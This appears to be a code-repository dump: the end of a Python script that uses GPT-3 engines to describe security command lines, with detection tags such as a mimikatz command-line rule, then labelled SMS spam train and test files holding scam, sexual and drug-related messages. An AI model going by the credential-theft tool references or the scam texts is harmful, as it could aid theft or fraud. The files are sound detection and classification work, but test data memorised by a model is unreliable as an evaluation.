391 | help="command line data",
392 | )
393 | parser.add_argument(
394 | "--tags",
395 | help="',' separated tags, for example: win_mimikatz_command_line,win_suspicious_execution_path",
396 | default=""
397 | )
398 | parser.add_argument(
399 | "--combine_descriptions",
400 | action="store_true",
401 | dest="combine_descriptions",
402 | help="to combine two descriptions as the final description",
403 | default=True
404 | )
405 | parser.add_argument(
406 | "--no_combine_descriptions",
407 | action="store_false",
408 | dest="combine_descriptions",
409 | help="not to combine two descriptions as the final description",
410 | default=True
411 | )
412 |
413 | parser.add_argument(
414 | "--engine_cmd2desc",
415 | help="gpt3 model for command to description",
416 | default=ENGINE_CMD2DESC
417 | )
418 | parser.add_argument(
419 | "--engine_desc2cmd",
420 | help="gpt3 model for description to command",
421 | default=ENGINE_DESC2CMD
422 | )
423 | parser.add_argument(
424 | "--temperature",
425 | type=float,
426 | help="temperature to control randomness of engine",
427 | default=ENGINE_TEMPERATURE
428 | )
429 |
430 | parser.add_argument(
431 | "--path_output_json",
432 | help="path for output json file",
433 | )
434 | parser.add_argument(
435 | "--path_input_json",
436 | help="path for input json file",
437 | )
438 | parser.add_argument(
439 | "--offset",
440 | type=int,
441 | help="the offset of input data for partial testing",
442 | default=0
443 | )
444 | parser.add_argument(
445 | "--limit",
446 | type=int,
447 | help="the limit of input data for partial testing",
448 | default=0
449 | )
450 |
451 | args = parser.parse_args()
452 | if args.run_type == "generate_desc":
453 | generate_description(
454 | args.cmd,
455 | args.tags,
456 | args.combine_descriptions,
457 | engine_cmd2desc=args.engine_cmd2desc,
458 | engine_desc2cmd=args.engine_desc2cmd, temperature=args.temperature
459 | )
460 | else:
461 | evaluate_approaches(
462 | args.path_output_json,
463 | args.path_input_json,
464 | engine_cmd2desc=args.engine_cmd2desc,
465 | engine_desc2cmd=args.engine_desc2cmd,
466 | temperature=args.temperature,
467 | combine_descriptions=args.combine_descriptions,
468 | offset=args.offset,
469 | limit=args.limit
470 | )
471 |
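generate_descriptions_from_cmd_tags ranks candidate descriptions by a score returned from get_sorted_similarity_score_list. It passes weights of 0.3 (description) and 0.2 (tags) when tags are given, and 0.5 and 0.0 otherwise. The scoring itself lives in similarity.py and is not shown in this section, so the sketch below is only one plausible reading. It assumes the remaining weight applies to the similarity between the original and the back-translated command, and every name and number in it is hypothetical.

```python
def combined_score(score_code, score_desc, score_tags,
                   weight_desc_score, weight_tags_score):
    """Weighted sum; the leftover weight is ASSUMED to apply to score_code."""
    weight_code = 1.0 - weight_desc_score - weight_tags_score
    return (weight_code * score_code
            + weight_desc_score * score_desc
            + weight_tags_score * score_tags)


def rank_candidates(candidates, has_tags, n=2):
    """Sort candidates by combined score, best first, and keep the top n."""
    if has_tags:
        weight_desc_score, weight_tags_score = 0.3, 0.2
    else:
        weight_desc_score, weight_tags_score = 0.5, 0.0
    scored = [
        (combined_score(c["score_code"], c["score_desc"], c["score_tags"],
                        weight_desc_score, weight_tags_score), c["desc"])
        for c in candidates
    ]
    return sorted(scored, key=lambda item: item[0], reverse=True)[:n]


# Hypothetical similarity scores for three generated descriptions.
candidates = [
    {"desc": "a", "score_code": 0.2, "score_desc": 0.9, "score_tags": 0.9},
    {"desc": "b", "score_code": 0.8, "score_desc": 0.6, "score_tags": 0.1},
    {"desc": "c", "score_code": 0.5, "score_desc": 0.5, "score_tags": 0.5},
]
top = rank_candidates(candidates, has_tags=True)
```

Under this reading, a description whose back-translated command closely matches the original command can outrank one that merely reads well, which is the point of the back-translation step.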
--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/test.csv:
--------------------------------------------------------------------------------
1 | label text
2 | Ham LMAO where's your fish memory when I need it?
3 | Ham Got meh... When?
4 | Ham You should change your fb to jaykwon thuglyfe falconerf
5 | Ham Not sure yet, still trying to get a hold of him
6 | Ham Chk in ur belovd ms dict
7 | Ham Aight I'll grab something to eat too, text me when you're back at mu
8 | Ham Give me a sec to think think about it
9 | Ham Maybe you should find something else to do instead???
10 | Ham She.s good. She was wondering if you wont say hi but she.s smiling now. So how are you coping with the long distance
11 | Ham I am thinking of going down to reg for pract lessons.. Flung my advance.. Haha wat time u going?
12 | Ham What Today-sunday..sunday is holiday..so no work..
13 | Ham Fuck babe, I miss you sooooo much !! I wish you were here to sleep with me ... My bed is so lonely ... I go now, to sleep ... To dream of you, my love ...
14 | Spam Free entry in 2 a wkly comp to win FA Cup final tkts 21st May 2005. Text FA to 87121 to receive entry question(std txt rate)T&C's apply 08452810075over18's
15 | Ham Kay... Since we are out already
16 | Ham hows my favourite person today? r u workin hard? couldn't sleep again last nite nearly rang u at 4.30
17 | Ham Yeh. Indians was nice. Tho it did kane me off a bit he he. We shud go out 4 a drink sometime soon. Mite hav 2 go 2 da works 4 a laugh soon. Love Pete x x
18 | Ham I want <#> rs da:)do you have it?
19 | Ham No, but you told me you were going, before you got drunk!
20 | Ham It's cool, let me know before it kicks off around <#> , I'll be out and about all day
21 | Ham When you just put in the + sign, choose my number and the pin will show. Right?
22 | Ham Lol u still feeling sick?
23 | Spam 22 days to kick off! For Euro2004 U will be kept up to date with the latest news and results daily. To be removed send GET TXT STOP to 83222
24 | Ham HIYA STU WOT U UP 2.IM IN SO MUCH TRUBLE AT HOME AT MOMENT EVONE HATES ME EVEN U! WOT THE HELL AV I DONE NOW? Y WONT U JUST TELL ME TEXT BCK PLEASE LUV DAN
25 | Ham I wanna watch that movie
26 | Ham You will be in the place of that man
27 | Ham No da. . Vijay going to talk in jaya tv
28 | Ham Whatsup there. Dont u want to sleep
29 | Ham Gud mrng dear hav a nice day
30 | Ham Yar but they say got some error.
31 | Ham Yup i thk they r e teacher said that will make my face look longer. Darren ask me not 2 cut too short.
32 | Ham Re your call; You didn't see my facebook huh?
33 | Ham You are not bothering me but you have to trust my answers. Pls.
34 | Ham Of cos can lar i'm not so ba dao ok... 1 pm lor... Y u never ask where we go ah... I said u would ask on fri but he said u will ask today...
35 | Ham Yeah, in fact he just asked if we needed anything like an hour ago. When and how much?
36 | Ham Wat r u doing?
37 | Ham Is it your yahoo boys that bring in the perf? Or legal.
38 | Ham He also knows about lunch menu only da. . I know
39 | Ham HEY DAS COOL... IKNOW ALL 2 WELLDA PERIL OF STUDENTFINANCIAL CRISIS!SPK 2 U L8R.
40 | Ham K actually can you guys meet me at the sunoco on howard? It should be right on the way
41 | Ham Nope. Meanwhile she talk say make i greet you.
42 | Ham How's it going? Got any exciting karaoke type activities planned? I'm debating whether to play football this eve. Feeling lazy though.
43 | Ham "Storming msg: Wen u lift d phne, u say ""HELLO"" Do u knw wt is d real meaning of HELLO?? . . . It's d name of a girl..! . . . Yes.. And u knw who is dat girl?? ""Margaret Hello"" She is d girlfrnd f Grah"
44 | Ham Here got ur favorite oyster... N got my favorite sashimi... Ok lar i dun say already... Wait ur stomach start rumbling...
45 | Ham Dear where you. Call me
46 | Spam You have an important customer service announcement. Call FREEPHONE 0800 542 0825 now!
47 | Ham I dont know oh. Hopefully this month.
48 | Ham Yeah if we do have to get a random dude we need to change our info sheets to PARTY <#> /7 NEVER STUDY just to be safe
49 | Spam Babe: U want me dont u baby! Im nasty and have a thing 4 filthyguys. Fancy a rude time with a sexy bitch. How about we go slo n hard! Txt XXX SLO(4msgs)
50 | Ham Hahaha..use your brain dear
51 | Ham I‘ll have a look at the frying pan in case it‘s cheap or a book perhaps. No that‘s silly a frying pan isn‘t likely to be a book
52 | Ham Nt only for driving even for many reasons she is called BBD..thts it chikku, then hw abt dvg cold..heard tht vinobanagar violence hw is the condition..and hw ru ? Any problem?
53 | Ham Hey sathya till now we dint meet not even a single time then how can i saw the situation sathya.
54 | Ham YO YO YO BYATCH WHASSUP?
55 | Ham Tell them u have a headache and just want to use 1 hour of sick time.
56 | Ham I told her I had a Dr appt next week. She thinks I'm gonna die. I told her its just a check. Nothing to be worried about. But she didn't listen.
57 | Ham I know dat feelin had it with Pete! Wuld get with em , nuther place nuther time mayb?
58 | Ham Don‘t give a flying monkeys wot they think and I certainly don‘t mind. Any friend of mine and all that!
59 | Ham Oh all have to come ah?
60 | Ham I want to go to perumbavoor
61 | Ham Fwiw the reason I'm only around when it's time to smoke is that because of gas I can only afford to be around when someone tells me to be and that apparently only happens when somebody wants to light
62 | Ham I calls you later. Afternoon onwords mtnl service get problem in south mumbai. I can hear you but you cann't listen me.
63 | Ham "Storming msg: Wen u lift d phne, u say ""HELLO"" Do u knw wt is d real meaning of HELLO?? . . . It's d name of a girl..! . . . Yes.. And u knw who is dat girl?? ""Margaret Hello"" She is d girlfrnd f Grah"
64 | Ham It's ok, at least armand's still around
65 | Ham Where can download clear movies. Dvd copies.
66 | Ham I'm always looking for an excuse to be in the city.
67 | Ham Nah man, my car is meant to be crammed full of people
68 | Ham Just taste fish curry :-P
69 | Ham Pls give her prometazine syrup. 5mls then <#> mins later feed.
70 | Ham Good afternoon, babe. How goes that day ? Any job prospects yet ? I miss you, my love ... *sighs* ... :-(
71 | Ham Omg how did u know what I ate?
72 | Ham I HAVE A DATE ON SUNDAY WITH WILL!!
73 | Ham cool. We will have fun practicing making babies!
74 | Spam For ur chance to win a £250 wkly shopping spree TXT: SHOP to 80878. T's&C's www.txt-2-shop.com custcare 08715705022, 1x150p/wk
75 | Spam Camera - You are awarded a SiPix Digital Camera! call 09061221066 fromm landline. Delivery within 28 days.
76 | Ham Do u ever get a song stuck in your head for no reason and it won't go away til u listen to it like 5 times?
77 | Ham So how are you really. What are you up to. How's the masters. And so on.
78 | Ham THANX4 TODAY CER IT WAS NICE 2 CATCH UP BUT WE AVE 2 FIND MORE TIME MORE OFTEN OH WELL TAKE CARE C U SOON.C
79 | Ham Nothing. Can...
80 | Ham G wants to know where the fuck you are
81 | Ham I like dis sweater fr mango but no more my size already so irritating.
82 | Ham No b4 Thursday
83 | Ham Anything lor. Juz both of us lor.
84 | Spam Someone U know has asked our dating service 2 contact you! Cant Guess who? CALL 09058091854 NOW all will be revealed. PO BOX385 M6 6WU
85 | Ham I cant pick the phone right now. Pls send a message
86 | Ham She said,'' do u mind if I go into the bedroom for a minute ? '' ''OK'', I sed in a sexy mood. She came out 5 minuts latr wid a cake...n My Wife,
87 | Ham There is a first time for everything :)
88 | Ham * Am on a train back from northampton so i'm afraid not!
89 | Ham Hi dear we saw dear. We both are happy. Where you my battery is low
90 | Ham Since when, which side, any fever, any vomitin.
91 | Ham Jus finish my lunch on my way home lor... I tot u dun wan 2 stay in sch today...
92 | Ham Watching cartoon, listening music & at eve had to go temple & church.. What about u?
93 | Spam URGENT! We are trying to contact you. Last weekends draw shows that you have won a £900 prize GUARANTEED. Call 09061701939. Claim code S89. Valid 12hrs only
94 | Ham Does not operate after <#> or what
95 | Spam Buy Space Invaders 4 a chance 2 win orig Arcade Game console. Press 0 for Games Arcade (std WAP charge) See o2.co.uk/games 4 Terms + settings. No purchase
96 | Ham Why is that, princess? I bet the brothas are all chasing you!
97 | Ham What's nannys address?
98 | Ham "Two fundamentals of cool life: ""Walk, like you are the KING""...! OR ""Walk like you Dont care,whoever is the KING""!... Gud nyt"
99 | Ham Am i that much dirty fellow?
100 | Ham Were somewhere on Fredericksburg
101 | Ham Haven't seen my facebook, huh? Lol!
102 | Ham There r many model..sony ericson also der.. <#> ..it luks good bt i forgot modl no
103 | Ham I dont have i shall buy one dear
104 | Ham Sorry, I'll call later
105 | Ham I do know what u mean, is the king of not havin credit! I'm goin2bed now. Night night sweet! Only1more sleep!
106 | Ham Yes i thought so. Thanks.
107 | Ham Haha, that was the first person I was gonna ask
108 | Ham I'm going for bath will msg you next <#> min..
109 | Ham Im cool ta luv but v.tired 2 cause i have been doin loads of planning all wk, we have got our social services inspection at the nursery! Take care & spk sn x.
110 | Ham I thought slide is enough.
111 | Ham Your opinion about me? 1. Over 2. Jada 3. Kusruthi 4. Lovable 5. Silent 6. Spl character 7. Not matured 8. Stylish 9. Simple Pls reply..
112 | Ham Also hi wesley how've you been
113 | Ham No sir. That's why i had an 8-hr trip on the bus last week. Have another audition next wednesday but i think i might drive this time.
114 | Ham I meant middle left or right?
115 | Ham Yeah, where's your class at?
116 | Ham Hmm, too many of them unfortunately... Pics obviously arent hot cakes. Its kinda fun tho
117 | Spam Reply with your name and address and YOU WILL RECEIVE BY POST a weeks completely free accommodation at various global locations www.phb1.com ph:08700435505150p
118 | Ham Big brother‘s really scraped the barrel with this shower of social misfits
119 | Ham Yar... I tot u knew dis would happen long ago already.
120 | Ham Ah, well that confuses things, doesnt it? I thought was friends with now. Maybe i did the wrong thing but i already sort of invited -tho he may not come cos of money.
121 | Ham Cool, we shall go and see, have to go to tip anyway. Are you at home, got something to drop in later? So lets go to town tonight! Maybe mum can take us in.
122 | Ham Yup i thk so until e shop closes lor.
123 | Ham No shit, but I wasn't that surprised, so I went and spent the evening with that french guy I met in town here and we fooled around a bit but I didn't let him fuck me
124 | Ham Just come home. I don't want u to be miserable
125 | Ham How many licks does it take to get to the center of a tootsie pop?
126 | Spam Missed call alert. These numbers called but left no message. 07008009200
127 | Ham For you information, IKEA is spelled with all caps. That is not yelling. when you thought i had left you, you were sitting on the bed among the mess when i came in. i said we were going after you got
128 | Ham Oh ! A half hour is much longer in Syria than Canada, eh ? Wow you must get SO much more work done in a day than us with all that extra time ! *grins*
129 | Ham It shall be fine. I have avalarr now. Will hollalater
130 | Ham We are both fine. Thanks
131 | Spam Sunshine Hols. To claim ur med holiday send a stamped self address envelope to Drinks on Us UK, PO Box 113, Bray, Wicklow, Eire. Quiz Starts Saturday! Unsub Stop
132 | Spam Urgent UR awarded a complimentary trip to EuroDisinc Trav, Aco&Entry41 Or £1000. To claim txt DIS to 87121 18+6*£1.50(moreFrmMob. ShrAcomOrSglSuplt)10, LS1 3AJ
133 | Ham True. It is passable. And if you get a high score and apply for phd, you get 5years of salary. So it makes life easier.
134 | Spam Hi - this is your Mailbox Messaging SMS alert. You have 40 matches. Please call back on 09056242159 to retrieve your messages and matches cc100p/min
135 | Ham "Best line said in Love: . ""I will wait till the day I can forget u Or The day u realize that u cannot forget me.""... Gn"
136 | Ham Fun fact: although you would think armand would eventually build up a tolerance or some shit considering how much he smokes, he gets fucked up in like 2 hits
137 | Ham You've always been the brainy one.
138 | Ham I have a rather prominent bite mark on my right cheek
139 | Ham Home so we can always chat
140 | Ham Is there coming friday is leave for pongal?do you get any news from your work place.
141 | Ham K so am I, how much for an 8th? Fifty?
142 | Ham Dai i downloaded but there is only exe file which i can only run that exe after installing.
143 | Ham S:-)if we have one good partnership going we will take lead:)
144 | Ham And is there a way you can send shade's stuff to her. And she has been wonderful too.
145 | Spam Dont forget you can place as many FREE Requests with 1stchoice.co.uk as you wish. For more Information call 08707808226.
146 | Ham Dunno lei he neva say...
147 | Ham Hi Harish's rent has been transfred to ur Acnt.
148 | Ham Gettin rdy to ship comp
149 | Ham You will go to walmart. I.ll stay.
150 | Ham I'm still looking for a car to buy. And have not gone 4the driving test yet.
151 | Ham Fine i miss you very much.
152 | Spam RECPT 1/3. You have ordered a Ringtone. Your order is being processed...
153 | Ham Well there's still a bit left if you guys want to tonight
154 | Ham Hi. I'm always online on yahoo and would like to chat with you someday
155 | Ham Nope... C ü then...
156 | Ham What i mean is do they come chase you out when its over or is it stated you can watch as many movies as you want.
157 | Ham Ok... U enjoy ur shows...
158 | Ham Hello which the site to download songs its urgent pls
159 | Ham You are a great role model. You are giving so much and i really wish each day for a miracle but God as a reason for everything and i must say i wish i knew why but i dont. I've looked up to you since
160 | Ham Mmmm.... I cant wait to lick it!
161 | Ham It's wylie, you in tampa or sarasota?
162 | Ham Love has one law; Make happy the person you love. In the same way friendship has one law; Never make ur friend feel alone until you are alive.... Gud night
163 | Ham I'm really not up to it still tonight babe
164 | Ham U coming back 4 dinner rite? Dad ask me so i re confirm wif u...
165 | Ham The sign of maturity is not when we start saying big things.. But actually it is, when we start understanding small things... *HAVE A NICE EVENING* BSLVYL
166 | Spam You are being contacted by our Dating Service by someone you know! To find out who it is, call from your mobile or landline 09064017305 PoBox75LDNS7
167 | Ham How's it feel? Mr. Your not my real Valentine just my yo Valentine even tho u hardly play!!
168 | Spam No. 1 Nokia Tone 4 ur mob every week! Just txt NOK to 87021. 1st Tone FREE ! so get txtin now and tell ur friends. 150p/tone. 16 reply HL 4info
169 | Ham Howz that persons story
170 | Ham Sorry, I'll call later
171 | Ham Boooo you always work. Just quit.
172 | Ham Fyi I'm gonna call you sporadically starting at like <#> bc we are not not doin this shit
173 | Ham No problem with the renewal. I.ll do it right away but i dont know his details.
174 | Spam Free video camera phones with Half Price line rental for 12 mths and 500 cross ntwk mins 100 txts. Call MobileUpd8 08001950382 or Call2OptOut/674&
175 | Ham Tell my bad character which u Dnt lik in me. I'll try to change in <#> . I ll add tat 2 my new year resolution. Waiting for ur reply.Be frank...good morning.
176 | Ham I have gone into get info bt dont know what to do
177 | Ham My love ... I hope your not doing anything drastic. Don't you dare sell your pc or your phone ...
178 | Ham <#> is fast approaching. So, Wish u a very Happy New Year Happy Sankranti Happy republic day Happy Valentines Day Happy Shivratri Happy Ugadi Happy Fools day Happy May Day Happy Independence Da
179 | Ham Dear friends, sorry for the late information. Today is the birthday of our loving Ar.Praveesh. for more details log on to face book and see. Its his number + <#> . Dont miss a delicious treat.
180 | Ham Horrible gal. Me in sch doing some stuff. How come u got mc?
181 | Spam You have 1 new voicemail. Please call 08719181513.
182 | Ham No it will reach by 9 only. She telling she will be there. I dont know
183 | Ham Carlos says he'll be at mu in <#> minutes
184 | Spam SMSSERVICES. for yourinclusive text credits, pls goto www.comuk.net login= 3qxj9 unsubscribe with STOP, no extra charge. help 08702840625.COMUK. 220-CM2 9AE
185 | Ham Yes, princess. Toledo.
186 | Ham Ok ill send you with in <DECIMAL> ok.
187 | Ham I'm okay. Chasing the dream. What's good. What are you doing next.
188 | Ham Boo. How's things? I'm back at home and a little bored already :-(
189 | Ham What is important is that you prevent dehydration by giving her enough fluids
190 | Ham Am surfing online store. For offers do you want to buy any thing.
191 | Ham Buzz! Hey, my Love ! I think of you and hope your day goes well. Did you sleep in ? I miss you babe. I long for the moment we are together again*loving smile*
192 | Ham Turns out my friends are staying for the whole show and won't be back til ~ <#> , so feel free to go ahead and smoke that $ <#> worth
193 | Ham Yep. I do like the pink furniture tho.
194 | Ham In which place do you want da.
195 | Ham Hey happy birthday...
196 | Ham Going to take your babe out ?
197 | Spam Urgent! call 09066612661 from landline. Your complementary 4* Tenerife Holiday or £10,000 cash await collection SAE T&Cs PO Box 3 WA14 2PX 150ppm 18+ Sender: Hol Offer
198 | Ham Just checking in on you. Really do miss seeing Jeremiah. Do have a great month
199 | Ham Where are you?when wil you reach here?
200 | Ham Hmmm.still we dont have opener?
201 | Spam Congrats! 2 mobile 3G Videophones R yours. call 09063458130 now! videochat wid your mates, play java games, Dload polyPH music, noline rentl.
202 | Ham Haha better late than ever, any way I could swing by?
203 | Spam Ur TONEXS subscription has been renewed and you have been charged £4.50. You can choose 10 more polys this month. www.clubzed.co.uk *BILLING MSG*
204 | Ham Another month. I need chocolate weed and alcohol.
205 | Spam How about getting in touch with folks waiting for company? Just txt back your NAME and AGE to opt in! Enjoy the community (150p/SMS)
206 | Ham Go chase after her and run her over while she's crossing the street
207 | Ham Is ur paper today in e morn or aft?
208 | Ham Lolnice. I went from a fish to ..water.?
209 | Ham Can you do online transaction?
210 | Ham Like <#> , same question
211 | Ham I got arrested for possession at, I shit you not, <TIME> pm
212 | Ham Hey gals...U all wanna meet 4 dinner at nìte?
213 | Ham Its hard to believe things like this. All can say lie but think twice before saying anything to me.
214 | Ham We not watching movie already. Xy wants 2 shop so i'm shopping w her now.
215 | Ham My exam is for february 4. Wish you a great day.
216 | Ham So do you have samus shoulders yet
217 | Ham You best watch what you say cause I get drunk as a motherfucker
218 | Ham have * good weekend.
219 | Ham Oh and by the way you do have more food in your fridge! Want to go out for a meal tonight?
220 | Ham happened here while you were adventuring
221 | Spam http//tms. widelive.com/index. wml?id=820554ad0a1705572711&first=true¡C C Ringtone¡
222 | Ham Greetings me, ! Consider yourself excused.
223 | Ham I wont touch you with out your permission.
224 | Ham I don't know jack shit about anything or i'd say/ask something helpful but if you want you can pretend that I did and just text me whatever in response to the hypotheticalhuagauahahuagahyuhagga
225 | Ham Oh ho. Is this the first time u use these type of words
226 | Ham One small prestige problem now.
227 | Spam Sunshine Quiz Wkly Q! Win a top Sony DVD player if u know which country Liverpool played in mid week? Txt ansr to 82277. £1.50 SP:Tyrone
228 | Ham Carlos'll be here in a minute if you still need to buy
229 | Ham Ü collecting ur laptop then going to configure da settings izzit?
230 | Ham Nice talking to you! please dont forget my pix :) i want to see all of you...
231 | Ham Its just the effect of irritation. Just ignore it
232 | Spam Sunshine Hols. To claim ur med holiday send a stamped self address envelope to Drinks on Us UK, PO Box 113, Bray, Wicklow, Eire. Quiz Starts Saturday! Unsub Stop
233 | Ham Thank you princess! You are so sexy...
234 | Ham He is world famamus....
235 | Ham So ü'll be submitting da project tmr rite?
236 | Spam Valentines Day Special! Win over £1000 in our quiz and take your partner on the trip of a lifetime! Send GO to 83600 now. 150p/msg rcvd. CustCare:08718720201.
237 | Ham Yup... Hey then one day on fri we can ask miwa and jiayin take leave go karaoke
238 | Ham And you! Will expect you whenever you text! Hope all goes well tomo
239 | Ham Yup it's at paragon... I havent decided whether 2 cut yet... Hee...
240 | Ham "'An Amazing Quote'' - ""Sometimes in life its difficult to decide whats wrong!! a lie that brings a smile or the truth that brings a tear...."""
241 | Ham Let me know how it changes in the next 6hrs. It can even be appendix but you are out of that age range. However its not impossible. So just chill and let me know in 6hrs
242 | Ham Okie but i scared u say i fat... Then u dun wan me already...
243 | Spam we tried to contact you re your response to our offer of a new nokia fone and camcorder hit reply or call 08000930705 for delivery
244 | Ham Better than bb. If he wont use it, his wife will or them doctor
245 | Ham Shall i start from hear.
246 | Ham Your opinion about me? 1. Over 2. Jada 3. Kusruthi 4. Lovable 5. Silent 6. Spl character 7. Not matured 8. Stylish 9. Simple Pls reply..
247 | Spam You have 1 new message. Please call 08718738034.
248 | Ham Idk. I'm sitting here in a stop and shop parking lot right now bawling my eyes out because i feel like i'm a failure in everything. Nobody wants me and now i feel like i'm failing you.
249 | Spam This is the 2nd time we have tried to contact u. U have won the £1450 prize to claim just call 09053750005 b4 310303. T&Cs/stop SMS 08718725756. 140ppm
250 | Ham Hey mate. Spoke to the mag people. We‘re on. the is deliver by the end of the month. Deliver on the 24th sept. Talk later.
251 | Ham Your board is working fine. The issue of overheating is also reslove. But still software inst is pending. I will come around 8'o clock.
252 | Ham It does it on its own. Most of the time it fixes my spelling. But sometimes it gets a completely diff word. Go figure
253 | Ham Wish i were with you now!
254 | Ham Your gonna have to pick up a $1 burger for yourself on your way home. I can't even move. Pain is killing me.
255 | Spam Bloomberg -Message center +447797706009 Why wait? Apply for your future http://careers. bloomberg.com
256 | Ham Is ur lecture over?
257 | Ham Dont give a monkeys wot they think and i certainly don't mind. Any friend of mine&all that! Just don't sleep wiv , that wud be annoyin!
258 |
--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/train_512.csv:
--------------------------------------------------------------------------------
1 | label text
2 | Ham Yeah I think my usual guy's still passed out from last night, if you get ahold of anybody let me know and I'll throw down
3 | Spam Mila, age23, blonde, new in UK. I look sex with UK guys. if u like fun with me. Text MTALK to 69866.18 . 30pp/txt 1st 5free. £1.50 increments. Help08718728876
4 | Spam Mila, age23, blonde, new in UK. I look sex with UK guys. if u like fun with me. Text MTALK to 69866.18 . 30pp/txt 1st 5free. £1.50 increments. Help08718728876
5 | Ham "And that is the problem. You walk around in ""julianaland"" oblivious to what is going on around you. I say the same things constantly and they go in one ear and out the other while you go off doing wha"
6 | Spam Urgent! Please call 09066612661 from your landline, your complimentary 4* Lux Costa Del Sol holiday or £1000 CASH await collection. ppm 150 SAE T&Cs James 28, EH74RR
7 | Spam We tried to call you re your reply to our sms for a video mobile 750 mins UNLIMITED TEXT free camcorder Reply or call now 08000930705 Del Thurs
8 | Spam Urgent! Please call 09061743811 from landline. Your ABTA complimentary 4* Tenerife Holiday or £5000 cash await collection SAE T&Cs Box 326 CW25WX 150ppm
9 | Ham The guy did some bitching but I acted like i'd be interested in buying something else next week and he gave it to us for free
10 | Spam Sorry I missed your call let's talk when you have the time. I'm on 07090201529
11 | Spam Free msg: Single? Find a partner in your area! 1000s of real people are waiting to chat now!Send CHAT to 62220Cncl send STOPCS 08717890890£1.50 per msg
12 | Ham I'm at work. Please call
13 | Ham K do I need a login or anything
14 | Spam Hi I'm sue. I am 20 years old and work as a lapdancer. I love sex. Text me live - I'm i my bedroom now. text SUE to 89555. By TextOperator G2 1DA 150ppmsg 18+
15 | Ham S.s:)i thinl role is like sachin.just standing. Others have to hit.
16 | Ham Do you work all this week ?
17 | Spam Free tones Hope you enjoyed your new content. text stop to 61610 to unsubscribe. help:08712400602450p Provided by tones2you.co.uk
18 | Ham Where is that one day training:-)
19 | Ham "What part of ""don't initiate"" don't you understand"
20 | Ham alright tyler's got a minor crisis and has to be home sooner than he thought so be here asap
21 | Spam 83039 62735=£450 UK Break AccommodationVouchers terms & conditions apply. 2 claim you mustprovide your claim number which is 15541
22 | Spam I'd like to tell you my deepest darkest fantasies. Call me 09094646631 just 60p/min. To stop texts call 08712460324 (nat rate)
23 | Spam Congrats! 1 year special cinema pass for 2 is yours. call 09061209465 now! C Suprman V, Matrix3, StarWars3, etc all 4 FREE! bx420-ip4-5we. 150pm. Dont miss out!
24 | Spam Had your mobile 11 months or more? U R entitled to Update to the latest colour mobiles with camera for Free! Call The Mobile Update Co FREE on 08002986030
25 | Spam 5 Free Top Polyphonic Tones call 087018728737, National Rate. Get a toppoly tune sent every week, just text SUBPOLY to 81618, £3 per pole. UnSub 08718727870.
26 | Ham Well, I have to leave for my class babe ... You never came back to me ... :-( ... Hope you have a nice sleep, my love
27 | Spam Hi ya babe x u 4goten bout me?' scammers getting smart..Though this is a regular vodafone no, if you respond you get further prem rate msg/subscription. Other nos used also. Beware!
28 | Ham HEY BABE! FAR 2 SPUN-OUT 2 SPK AT DA MO... DEAD 2 DA WRLD. BEEN SLEEPING ON DA SOFA ALL DAY, HAD A COOL NYTHO, TX 4 FONIN HON, CALL 2MWEN IM BK FRMCLOUD 9! J X
29 | Spam **FREE MESSAGE**Thanks for using the Auction Subscription Service. 18 . 150p/MSGRCVD 2 Skip an Auction txt OUT. 2 Unsubscribe txt STOP CustomerCare 08718726270
30 | Spam For sale - arsenal dartboard. Good condition but no doubles or trebles!
31 | Spam URGENT! Your Mobile number has been awarded a 2000 prize GUARANTEED. Call 09061790125 from landline. Claim 3030. Valid 12hrs only 150ppm
32 | Spam Win the newest Harry Potter and the Order of the Phoenix (Book 5) reply HARRY, answer 5 questions - chance to be the first among readers!
33 | Ham Nan sonathaya soladha. Why boss?
34 | Ham It's fine, imma get a drink or somethin. Want me to come find you?
35 | Ham Ok.
36 | Ham Erm. I thought the contract ran out the4th of october.
37 | Spam 8007 25p 4 Alfie Moon's Children in Need song on ur mob. Tell ur m8s. Txt TONE CHARITY to 8007 for nokias or POLY CHARITY for polys :zed 08701417012 profit 2 charity
38 | Spam No. 1 Nokia Tone 4 ur mob every week! Just txt NOK to 87021. 1st Tone FREE ! so get txtin now and tell ur friends. 150p/tone. 16 reply HL 4info
39 | Spam Sexy Singles are waiting for you! Text your AGE followed by your GENDER as wither M or F E.G.23F. For gay men text your AGE followed by a G. e.g.23G.
40 | Spam Gr8 Poly tones 4 ALL mobs direct 2u rply with POLY TITLE to 8007 eg POLY BREATHE1 Titles: CRAZYIN, SLEEPINGWITH, FINEST, YMCA :getzed.co.uk POBox365O4W45WQ 300p
41 | Spam For ur chance to win a £250 cash every wk TXT: ACTION to 80608. T's&C's www.movietrivia.tv custcare 08712405022, 1x150p/wk.
42 | Ham Yes.he have good crickiting mind
43 | Ham HEY MATE! HOWS U HONEY?DID U AVE GOOD HOLIDAY? GIMMI DE GOSS!x
44 | Spam Free Top ringtone -sub to weekly ringtone-get 1st week free-send SUBPOLY to 81618-?3 per week-stop sms-08718727870
45 | Ham I love your ass! Do you enjoy doggy style? :)
46 | Ham Sometimes we put walls around our hearts,not just to be safe from getting hurt.. But to find out who cares enough to break the walls & get closer.. GOODNOON:)
47 | Ham 1 in cbe. 2 in chennai.
48 | Spam PRIVATE! Your 2003 Account Statement for 07753741225 shows 800 un-redeemed S. I. M. points. Call 08715203677 Identifier Code: 42478 Expires 24/10/04
49 | Ham NEFT Transaction with reference number <#> for Rs. <DECIMAL> has been credited to the beneficiary account on <#> at <TIME> : <#>
50 | Spam 88066 FROM 88066 LOST 3POUND HELP
51 | Spam Well done ENGLAND! Get the official poly ringtone or colour flag on yer mobile! text TONE or FLAG to 84199 NOW! Opt-out txt ENG STOP. Box39822 W111WX £1.50
52 | Ham How long before you get reply, just defer admission til next semester
53 | Ham Hi :)finally i completed the course:)
54 | Ham I am in tirupur da, once you started from office call me.
55 | Ham Happy birthday... May u find ur prince charming soon n dun work too hard...
56 | Ham Love it! Daddy will make you scream with pleasure! I am going to slap your ass with my dick!
57 | Ham Yup no more already... Thanx 4 printing n handing it up.
58 | Spam Wanna get laid 2nite? Want real Dogging locations sent direct to ur mobile? Join the UK's largest Dogging Network. Txt PARK to 69696 now! Nyt. ec2a. 3lp £1.50/msg
59 | Ham 2 and half years i missed your friendship:-)
60 | Ham Now got tv 2 watch meh? U no work today?
61 | Ham Aiyar hard 2 type. U later free then tell me then i call n scold n tell u.
62 | Spam WIN a £200 Shopping spree every WEEK Starting NOW. 2 play text STORE to 88039. SkilGme. TsCs08714740323 1Winawk! age16 £1.50perweeksub.
